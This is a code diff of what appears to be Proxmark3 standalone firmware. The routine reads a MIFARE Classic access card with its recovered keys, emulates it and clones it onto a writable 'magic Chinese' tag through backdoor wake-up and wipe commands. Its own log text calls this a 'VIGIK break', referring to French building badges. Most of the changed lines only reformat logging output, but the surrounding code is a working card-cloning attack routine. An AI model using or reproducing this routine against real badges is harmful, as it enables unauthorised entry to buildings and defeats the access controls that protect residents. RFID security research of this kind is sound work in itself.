@ -358,34 +555,64 @@ void RunMod() {
}
emlSetMem(mblock, FirstBlockOfSector(sectorNo) + NumBlocksPerSector(sectorNo) - 1, 1);
}
Dbprintf("%s>>%s Setting Keys->Emulator MEM...[%sOK%s]", _YELLOW_, _WHITE_, _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>%s Setting Keys->Emulator MEM...[%sOK%s]", _YELLOW_, _WHITE_, _GREEN_, _WHITE_);
/* filling TAG to emulator */
uint8_t filled = 0;
Dbprintf("%s>>%s Filling Emulator <- from A keys...", _YELLOW_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>%s Filling Emulator <- from A keys...", _YELLOW_, _WHITE_);
e_MifareECardLoad(sectorsCnt, 0, 0, &filled);
if (filled != 1) {
Dbprintf("%s>>%s W_FAILURE ! %sTrying fallback B keys....", _RED_, _ORANGE_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>%s W_FAILURE ! %sTrying fallback B keys....", _RED_, _ORANGE_, _WHITE_);
/* no trace, no dbg */
e_MifareECardLoad(sectorsCnt, 1, 0, &filled);
if (filled != 1) {
Dbprintf("FATAL:EML_FALLBACKFILL_B");
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "FATAL:EML_FALLBACKFILL_B");
// cmd_send(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0);
return;
}
}
end_time = GetTickCount();
Dbprintf("%s>>%s Time for VIGIK break :%s%dms%s", _GREEN_, _WHITE_, _YELLOW_, end_time - start_time, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>%s Time for VIGIK break :%s%dms%s", _GREEN_, _WHITE_, _YELLOW_, end_time - start_time, _WHITE_);
// cmd_send(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0);
// SIM ?
Dbprintf("-> We launch Emulation ->");
Dbprintf("%s HOLD ON : %s When you'll click, simm will stop", _RED_, _WHITE_);
Dbprintf("Then %s immediately %s Well' try to %s dump our emulator state%s in a %s chinese tag%s", _RED_, _WHITE_, _YELLOW_, _WHITE_, _CYAN_, _WHITE_);
Dbprintf("SimulaWaiting...");
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "-> We launch Emulation ->");
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s!> HOLD ON : %s When you'll click, simm will stop", _RED_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "Then %s immediately %s we'll try to %s dump our emulator state%s \r\nin a %s chinese tag%s", _RED_, _WHITE_, _YELLOW_, _WHITE_,
_CYAN_, _WHITE_);
cjSetCursLeft();
cjSetCursLeft();
cjTabulize();
vtsend_cursor_position_save(NULL);
vtsend_set_attribute(NULL, 1);
vtsend_set_attribute(NULL, 5);
DbprintfEx(FLAG_NOLOG, "[ SIMULATION ]");
vtsend_set_attribute(NULL, 0);
Mifare1ksim(0, 0, 0, NULL);
Dbprintf("<- We're out of Emulation");
vtsend_cursor_position_restore(NULL);
DbprintfEx(FLAG_NOLOG, "[ SIMUL ENDED ]%s", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "<- We're out of Emulation");
// END SIM
/*for (;;) {
@ -398,58 +625,37 @@ void RunMod() {
} else if (button_action == BUTTON_SINGLE_CLICK) {
*/
cjSetCursLeft();
Dbprintf("Trying a clone !");
DbprintfEx(FLAG_NOLOG, "-> Trying a clone !");
saMifareMakeTag();
Dbprintf("End Cloning.");
cjSetCursLeft();
vtsend_cursor_position_restore(NULL);
DbprintfEx(FLAG_NOLOG, "%s[ CLONED? ]", _CYAN_);
DbprintfEx(FLAG_NOLOG, "-> End Cloning.");
WDT_HIT();
// break;
/*} else if (button_action == BUTTON_HOLD) {
Dbprintf("Playtime over. Begin cloning...");
DbprintfEx(FLAG_RAWPRINT,"Playtime over. Begin cloning...");
iGotoClone = 1;
break;
}*/
// Debunk...
// SpinDelay(300);
Dbprintf("Endof Standalone ! You can take shell back");
cjSetCursLeft();
cjTabulize();
vtsend_set_attribute(NULL, 0);
vtsend_set_attribute(NULL, 7);
DbprintfEx(FLAG_NOLOG, "- [ LA FIN ] -\r\n%s`-> You can take shell back :) ...", _WHITE_);
cjSetCursLeft();
vtsend_set_attribute(NULL, 0);
return;
}
/*
case CMD_SIMULATE_MIFARE_CARD:
Dbprintf("-> We launch Emulation ->");
Mifare1ksim(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes);
Dbprintf("<- We're out of Emulation");
break;
case CMD_CJB_EML_MEMGET:
CJBEMemGet(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes);
break;
// Work with "magic Chinese" card
case CMD_MIFARE_CSETBLOCK:
MifareCSetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes);
break;
case CMD_MIFARE_CGETBLOCK:
MifareCGetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes);
break;
case CMD_MIFARE_CIDENT:
MifareCIdent();
break;
// Work with "magic Chinese" card
case CMD_MIFARE_CSETBLOCK:
MifareCSetBlock(c->arg[0], c->arg[1], c->d.asBytes);
break;
case CMD_MIFARE_CGETBLOCK:
MifareCGetBlock(c->arg[0], c->arg[1], c->d.asBytes);
break;
case CMD_MIFARE_CIDENT:
MifareCIdent();
break;
*/
/* Abusive microgain on original MifareECardLoad :
* - *datain used as error return
* - tracing is falsed
@ -478,13 +684,13 @@ void e_MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *dat
set_tracing(false);
bool isOK = true;
iso14443a_fast_select_card(cjuid, 0);
// iso14443a_fast_select_card(cjuid, 0);
/* if (!iso14443a_select_card(uid, NULL, &cuid, true, 0, true)) {
isOK = false;
if (MF_DBGLEVEL >= 1)
Dbprintf("Can't select card");
}*/
if (!iso14443a_select_card(cjuid, NULL, &cjcuid, true, 0, true)) {
isOK = false;
if (MF_DBGLEVEL >= 1)
DbprintfEx(FLAG_RAWPRINT, "Can't select card");
}
for (uint8_t sectorNo = 0; isOK && sectorNo < numSectors; sectorNo++) {
ui64Key = emlGetKey(sectorNo, keyType);
@ -492,14 +698,14 @@ void e_MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *dat
if (isOK && mifare_classic_auth(pcs, cjcuid, FirstBlockOfSector(sectorNo), keyType, ui64Key, AUTH_FIRST)) {
isOK = false;
if (MF_DBGLEVEL >= 1)
Dbprintf("Sector[%2d]. Auth error", sectorNo);
DbprintfEx(FLAG_NOLOG, "Sector[%2d]. Auth error", sectorNo);
break;
}
} else {
if (isOK && mifare_classic_auth(pcs, cjcuid, FirstBlockOfSector(sectorNo), keyType, ui64Key, AUTH_NESTED)) {
isOK = false;
if (MF_DBGLEVEL >= 1)
Dbprintf("Sector[%2d]. Auth nested error", sectorNo);
DbprintfEx(FLAG_NOLOG, "Sector[%2d]. Auth nested error", sectorNo);
break;
}
}
@ -508,7 +714,7 @@ void e_MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *dat
if (isOK && mifare_classic_readblock(pcs, cjcuid, FirstBlockOfSector(sectorNo) + blockNo, dataoutbuf)) {
isOK = false;
if (MF_DBGLEVEL >= 1)
Dbprintf("Error reading sector %2d block %2d", sectorNo, blockNo);
DbprintfEx(FLAG_NOLOG, "Error reading sector %2d block %2d", sectorNo, blockNo);
break;
};
if (isOK) {
@ -528,7 +734,7 @@ void e_MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *dat
if (mifare_classic_halt(pcs, cjcuid)) {
if (MF_DBGLEVEL >= 1)
Dbprintf("Halt error");
DbprintfEx(FLAG_NOLOG, "Halt error");
};
// ----------------------------- crypto1 destroy
@ -538,7 +744,7 @@ void e_MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *dat
LEDsoff();
if (MF_DBGLEVEL >= 2)
DbpString("EMUL FILL SECTORS FINISHED");
DbpString("EMUL FILL SECTORS FINISHED\n");
}
/* . . . */
@ -550,8 +756,8 @@ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, ui
MF_DBGLEVEL = MF_DBG_NONE;
iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
set_tracing(false);
// uint8_t uid[10];
// uint32_t cuid;
// uint8_t uid[10];
// uint32_t cuid;
struct Crypto1State mpcs = {0, 0};
struct Crypto1State *pcs;
pcs = &mpcs;
@ -561,9 +767,10 @@ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, ui
LEDsoff();
/* no need for anticollision. just verify tag is still here */
if (!iso14443a_fast_select_card(cjuid, 0)) {
// if (!iso14443a_select_card(uid, NULL, &cuid, true, 0, true)) {
Dbprintf("FATAL : E_MF_LOSTTAG");
// if (!iso14443a_fast_select_card(cjuid, 0)) {
if (!iso14443a_select_card(cjuid, NULL, &cjcuid, true, 0, true)) {
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%sFATAL%s : E_MF_LOSTTAG", _RED_, _WHITE_);
return -1;
}
@ -589,8 +796,17 @@ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, ui
}
void saMifareMakeTag(void) {
// uint8_t cfail = 0;
Dbprintf(">> Write to Special");
// uint8_t cfail = 0;`
cjSetCursLeft();
cjTabulize();
vtsend_cursor_position_save(NULL);
vtsend_set_attribute(NULL, 1);
DbprintfEx(FLAG_NOLOG, "[ CLONING ]");
vtsend_set_attribute(NULL, 0);
cjSetCursFRight();
DbprintfEx(FLAG_NOLOG, ">> Write to Special:");
int flags = 0;
LED_A_ON(); // yellow
for (int blockNum = 0; blockNum < 16 * 4; blockNum++) {
@ -610,20 +826,32 @@ void saMifareMakeTag(void) {
flags = 0x04 + 0x10;
if (saMifareCSetBlock(0, flags & 0xFE, blockNum, mblock)) { //&& cnt <= retry) {
// cnt++;
Dbprintf("Block :%d %sOK%s", blockNum, _GREEN_, _WHITE_);
// Dbprintf("FATAL:E_MF_CHINESECOOK_NORICE");
// cnt++;
cjSetCursFRight();
if (currfline > 53) {
currfline = 54;
}
DbprintfEx(FLAG_NOLOG, "Block :%02x %sOK%s", blockNum, _GREEN_, _WHITE_);
// DbprintfEx(FLAG_RAWPRINT,"FATAL:E_MF_CHINESECOOK_NORICE");
// cfail=1;
// return;
continue;
} else {
Dbprintf("%sFAIL%s : CHN_FAIL_BLK_%d_NOK", _RED_, _WHITE_, blockNum);
cjSetCursLeft();
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "`--> %sFAIL%s : CHN_FAIL_BLK_%02x_NOK", _RED_, _WHITE_, blockNum);
cjSetCursFRight();
DbprintfEx(FLAG_NOLOG, "%s>>>>%s STOP AT %02x", _RED_, _WHITE_, blockNum);
break;
}
Dbprintf("%s>>>>>>>> END <<<<<<<<%s", _YELLOW_, _WHITE_);
cjSetCursFRight();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>> END <<<<<<<<%s", _YELLOW_, _WHITE_);
// break;
/*if (cfail == 1) {
Dbprintf("FATAL: E_MF_HARA_KIRI_\r\n");
DbprintfEx(FLAG_RAWPRINT,"FATAL: E_MF_HARA_KIRI_\r\n");
break;
} */
}
@ -652,9 +880,9 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
// variables
byte_t isOK = 0;
// uint8_t uid[10] = {0x00};
// uint8_t uid[10] = {0x00};
uint8_t d_block[18] = {0x00};
// uint32_t cuid;
// uint32_t cuid;
uint8_t receivedAnswer[MAX_MIFARE_FRAME_SIZE];
uint8_t receivedAnswerPar[MAX_MIFARE_PARITY_SIZE];
@ -671,20 +899,21 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
}
while (true) {
// cjSetCursLeft();
// get UID from chip
if (workFlags & 0x01) {
if (!iso14443a_fast_select_card(cjuid, 0)) {
// if (!iso14443a_fast_select_card(cjuid, 0)) {
// if (!iso14443a_select_card(uid, NULL, &cuid, true, 0, true)) {
if (!iso14443a_select_card(cjuid, NULL, &cjcuid, true, 0, true)) {
if (MF_DBGLEVEL >= 1)
Dbprintf("Can't select card");
DbprintfEx(FLAG_NOLOG, "Can't select card");
break;
};
if (mifare_classic_halt(NULL, cjcuid)) {
if (MF_DBGLEVEL >= 1)
Dbprintf("Halt error");
DbprintfEx(FLAG_NOLOG, "Halt error");
break;
};
};
@ -694,20 +923,20 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
ReaderTransmitBitsPar(wupC1, 7, 0, NULL);
if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("wupC1 error");
DbprintfEx(FLAG_NOLOG, "wupC1 error");
break;
};
ReaderTransmit(wipeC, sizeof(wipeC), NULL);
if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) {
if (MF_DBGLEVEL >= 1)
Dbprintf("wipeC error");
DbprintfEx(FLAG_NOLOG, "wipeC error");
break;
};
if (mifare_classic_halt(NULL, cjcuid)) {
if (MF_DBGLEVEL >= 1)
Dbprintf("Halt error");
DbprintfEx(FLAG_NOLOG, "Halt error");
break;
};
};
@ -718,37 +947,39 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
ReaderTransmitBitsPar(wupC1, 7, 0, NULL);
if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("wupC1 error");
DbprintfEx(FLAG_NOLOG, "wupC1 error");
break;
};
ReaderTransmit(wupC2, sizeof(wupC2), NULL);
if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("wupC2 error");
DbprintfEx(FLAG_NOLOG, "wupC2 errorv");
break;
};
}
if ((mifare_sendcmd_short(NULL, 0, 0xA0, blockNo, receivedAnswer, receivedAnswerPar, NULL) != 1) || (receivedAnswer[0] != 0x0a)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("write block send command error");
DbprintfEx(FLAG_NOLOG, "write block send command error");
break;
};
memcpy(d_block, datain, 16);
AddCrc14A(d_block, 16);
AddCrc14A(d_block,16);
ReaderTransmit(d_block, sizeof(d_block), NULL);
if ((ReaderReceive(receivedAnswer, receivedAnswerPar) != 1) || (receivedAnswer[0] != 0x0a)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("write block send data error");
DbprintfEx(FLAG_NOLOG, "write block send data error");
break;
};
if (workFlags & 0x04) {
if (mifare_classic_halt(NULL, cjcuid)) {
// if (MF_DBGLEVEL >= 1)
Dbprintf("Halt error");
cjSetCursFRight();
DbprintfEx(FLAG_NOLOG, "Halt error");
break;
};
}
@ -765,3 +996,4 @@ int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *data
return isOK;
}